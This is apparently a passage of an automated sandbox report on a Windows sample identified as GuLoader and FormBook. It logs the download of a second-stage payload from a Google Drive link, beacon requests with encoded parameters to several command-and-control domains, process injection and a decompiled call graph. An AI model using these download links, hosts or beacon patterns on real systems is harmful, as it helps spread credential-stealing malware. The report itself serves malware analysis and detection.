                                                                                                Data Raw: 32 45 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 76 5a 66 53 51 6c 79 6f 65 6e 57 37 46 69 51 57 30 30 39 75 46 75 61 4b 63 4d 6e 4e 46 72 44 4a 37 53 79 56 57 2f 51 54 57 6d 44 46 45 32 45 37 48 4e 50 7a 6c 31 54 41 2f 6d 6d 77 78 4d 34 6d 51 70 75 65 48 58 74 79 61 65 76 4b 6b 32 6d 6b 6c 53 56 49 4c 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6c 37 61 65 68 2e 75 73 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6c 37 61 65 68 20 52 65 73 6f 75 [TRUNCATED]
                                                                                                Data Ascii: 2EE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_vZfSQlyoenW7FiQW009uFuaKcMnNFrDJ7SyVW/QTWmDFE2E7HNPzl1TA/mmwxM4mQpueHXtyaevKk2mklSVILg==><head><meta charset="utf-8"><title>l7aeh.us&nbsp;-&nbsp;l7aeh Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="l7aeh.us is your first and best source for all of the information youre looking for. From general topics to more
                                                                                                May 27, 2024 12:38:29.519735098 CEST1289INData Raw: 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6c 37 61 65 68 2e 75 73 20 68 61 73 20 69 74 20 61 6c 6c 2e 20 57 65 20 68 6f 70 65 20 79 6f 75 20 66 69 6e 64 20 77 68 61 74 20
                                                                                                Data Ascii: of what you would expect to find here, l7aeh.us has it all. We hope you find what you are searching for!"><link rel="icon" 570 type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style>
                                                                                                May 27, 2024 12:38:29.519774914 CEST1289INData Raw: 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69
                                                                                                Data Ascii: ,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz-focus-inner,[
                                                                                                May 27, 2024 12:38:29.519835949 CEST1289INData Raw: 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e
                                                                                                Data Ascii: center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-b
                                                                                                May 27, 2024 12:38:29.519891024 CEST1289INData Raw: 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63
                                                                                                Data Ascii: ntent-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#949494}.container
                                                                                                May 27, 2024 12:38:29.519915104 CEST1289INData Raw: 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 7d 2e
                                                                                                Data Ascii: align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-t
May 27, 2024 12:38:29.709311008 CEST | 1289 | IN
                                                                                                Data Ascii: t:10px;grid-area:1/1/2/2} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"l7aeh.us","domainName":"l7aeh.us","domainPrice":0,"domainCurrency":"","adultFlag":false,"pu":"//www.l7aeh.us","dns


Session ID | Source IP | Source Port | Destination IP | Destination Port
96 | 192.168.11.30 | 49930 | 183.111.161.243 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:38:35.017544985 CEST | 479 | OUT | GET /udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:38:35.439846039 CEST | 475 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:38:35 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 0
                                                                                                Connection: close
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                X-Redirect-By: WordPress
                                                                                                Location: http://grimfilm.co.kr/udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG


Session ID | Source IP | Source Port | Destination IP | Destination Port
97 | 192.168.11.30 | 49931 | 3.64.163.50 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:38:40.644901037 CEST | 479 | OUT | GET /udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:38:40.829694033 CEST | 292 | IN | HTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:38:40 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
98 | 192.168.11.30 | 49932 | 203.161.49.193 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:38:53.289335012 CEST | 475 | OUT | GET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA= HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:38:53.464199066 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:38:53 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
99 | 192.168.11.30 | 49934 | 3.64.163.50 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:39:04.563126087 CEST | 477 | OUT | GET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=s4Vg1LN8KF8xRZjsTtx1ePAa6rrZ5tQl+fVkjM0Cwqz81ntfAq/M/gVPDnM69uqRMv9oQTSMlpkV8bcLOwxh9sPoo9S5h5afGeOqgp9TfQfssWCdBUAOLW8= HTTP/1.1
                                                                                                Host: www.gaglianoart.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:39:04.751271963 CEST | 293 | IN | HTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:39:04 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Ascii: 7<html>9 <head>4f <meta http-equiv='refresh' content='0; url=http://www.gaglianoart.com/' />a </head>8</html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
100 | 192.168.11.30 | 49935 | 162.209.189.152 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:39:10.080826044 CEST | 192 | IN | HTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
101 | 192.168.11.30 | 49936 | 208.112.85.150 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:39:15.195832014 CEST | 478 | OUT | GET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo= HTTP/1.1
                                                                                                Host: www.fivetownsjcc.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:39:15.303596020 CEST | 383 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:38:55 GMT
                                                                                                Server: Apache
                                                                                                X-SERVER: 3908
                                                                                                Content-Length: 203
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
102 | 192.168.11.30 | 49937 | 208.112.85.150 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:39:25.582551956 CEST | 481 | OUT | GET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.fivetownsjcc.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:39:25.689292908 CEST | 383 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:39:05 GMT
                                                                                                Server: Apache
                                                                                                X-SERVER: 3908
                                                                                                Content-Length: 203
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.30 | 49827 | 142.251.16.101 | 443 | 772 | C:\Users\user\Desktop\Nondesistance.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-27 10:30:45 UTC | 216 | OUT | GET /uc?export=download&id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                Host: drive.google.com
                                                                                                Cache-Control: no-cache
2024-05-27 10:30:46 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                                                                                Content-Type: application/binary
                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                Date: Mon, 27 May 2024 10:30:46 GMT
                                                                                                Location: https://drive.usercontent.google.com/download?id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm&export=download
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                Content-Security-Policy: script-src 'nonce-SZTWUdeK99D1mW4lMMhMzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                Server: ESF
                                                                                                Content-Length: 0
                                                                                                X-XSS-Protection: 0
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.30 | 49828 | 172.253.62.132 | 443 | 772 | C:\Users\user\Desktop\Nondesistance.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-27 10:30:46 UTC | 258 | OUT | GET /download?id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm&export=download HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                Cache-Control: no-cache
                                                                                                Host: drive.usercontent.google.com
                                                                                                Connection: Keep-Alive
2024-05-27 10:30:47 UTC | 4804 | IN | HTTP/1.1 200 OK
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Security-Policy: sandbox
                                                                                                Content-Security-Policy: default-src 'none'
                                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                                X-Content-Security-Policy: sandbox
                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Content-Disposition: attachment; filename="zkNkZYUN98.bin"
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Allow-Credentials: false
                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Dom [TRUNCATED]
                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                Accept-Ranges: bytes
                                                                                                Content-Length: 269888
                                                                                                Last-Modified: Thu, 23 May 2024 10:54:35 GMT
                                                                                                X-GUploader-UploadID: ABPtcPpVfAK6Jz8kHnGnPjE47aew-zpYdUIPDPiP-FokqpnlzEpub4ZVyxKdP1JFjqHNDri5HVY
                                                                                                Date: Mon, 27 May 2024 10:30:46 GMT
                                                                                                Expires: Mon, 27 May 2024 10:30:46 GMT
                                                                                                Cache-Control: private, max-age=0
                                                                                                X-Goog-Hash: crc32c=UDgTRA==
                                                                                                Server: UploadServer
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close


                                                                                                Target ID:4
                                                                                                Start time:06:30:17
                                                                                                Start date:27/05/2024
                                                                                                Path:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Nondesistance.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:878'808 bytes
                                                                                                MD5 hash:9695B61F42F2E5A77E2E8D29963FE980
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.20222463111.00000000050BE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:9
                                                                                                Start time:06:30:36
                                                                                                Start date:27/05/2024
                                                                                                Path:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Nondesistance.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:878'808 bytes
                                                                                                MD5 hash:9695B61F42F2E5A77E2E8D29963FE980
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:10
                                                                                                Start time:06:30:55
                                                                                                Start date:27/05/2024
                                                                                                Path:C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe"
                                                                                                Imagebase:0xc30000
                                                                                                File size:140'800 bytes
                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:11
                                                                                                Start time:06:30:57
                                                                                                Start date:27/05/2024
                                                                                                Path:C:\Windows\SysWOW64\write.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\SysWOW64\write.exe"
                                                                                                Imagebase:0xa00000
                                                                                                File size:10'240 bytes
                                                                                                MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                Reputation:moderate
                                                                                                Has exited:false

                                                                                                Target ID:12
                                                                                                Start time:06:31:21
                                                                                                Start date:27/05/2024
                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                Imagebase:0x7ff6ed470000
                                                                                                File size:687'008 bytes
                                                                                                MD5 hash:D1CC73370B9EF7D74E6D9FD9248CD687
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true


                                                                                                  Execution Graph

                                                                                                  Execution Coverage:23.3%
                                                                                                  Dynamic/Decrypted Code Coverage:14.5%
                                                                                                  Signature Coverage:25.6%
                                                                                                  Total number of Nodes:1458
                                                                                                  Total number of Limit Nodes:46
                                                                                                  execution_graph 4704 10001000 4707 1000101b 4704->4707 4714 100014bb 4707->4714 4709 10001020 4710 10001024 4709->4710 4711 10001027 GlobalAlloc 4709->4711 4712 100014e2 3 API calls 4710->4712 4711->4710 4713 10001019 4712->4713 4716 100014c1 4714->4716 4715 100014c7 4715->4709 4716->4715 4717 100014d3 GlobalFree 4716->4717 4717->4709 3629 403a41 3630 403b94 3629->3630 3631 403a59 3629->3631 3633 403be5 3630->3633 3634 403ba5 GetDlgItem GetDlgItem 3630->3634 3631->3630 3632 403a65 3631->3632 3635 403a70 SetWindowPos 3632->3635 3636 403a83 3632->3636 3638 403c3f 3633->3638 3647 401389 2 API calls 3633->3647 3637 403f14 19 API calls 3634->3637 3635->3636 3640 403aa0 3636->3640 3641 403a88 ShowWindow 3636->3641 3642 403bcf SetClassLongA 3637->3642 3643 403b8f 3638->3643 3699 403f60 3638->3699 3644 403ac2 3640->3644 3645 403aa8 DestroyWindow 3640->3645 3641->3640 3646 40140b 2 API calls 3642->3646 3649 403ac7 SetWindowLongA 3644->3649 3650 403ad8 3644->3650 3648 403e9d 3645->3648 3646->3633 3651 403c17 3647->3651 3648->3643 3658 403ece ShowWindow 3648->3658 3649->3643 3655 403b81 3650->3655 3656 403ae4 GetDlgItem 3650->3656 3651->3638 3652 403c1b SendMessageA 3651->3652 3652->3643 3653 40140b 2 API calls 3669 403c51 3653->3669 3654 403e9f DestroyWindow EndDialog 3654->3648 3736 403f7b 3655->3736 3659 403b14 3656->3659 3660 403af7 SendMessageA IsWindowEnabled 3656->3660 3658->3643 3662 403b21 3659->3662 3663 403b68 SendMessageA 3659->3663 3664 403b34 3659->3664 3673 403b19 3659->3673 3660->3643 3660->3659 3662->3663 3662->3673 3663->3655 3666 403b51 3664->3666 3667 403b3c 3664->3667 3671 40140b 2 API calls 3666->3671 3730 40140b 3667->3730 3668 403b4f 3668->3655 3669->3643 3669->3653 3669->3654 3672 403f14 19 API calls 3669->3672 3690 403ddf DestroyWindow 3669->3690 3702 405d51 3669->3702 3720 403f14 3669->3720 3674 403b58 3671->3674 3672->3669 3733 403eed 3673->3733 
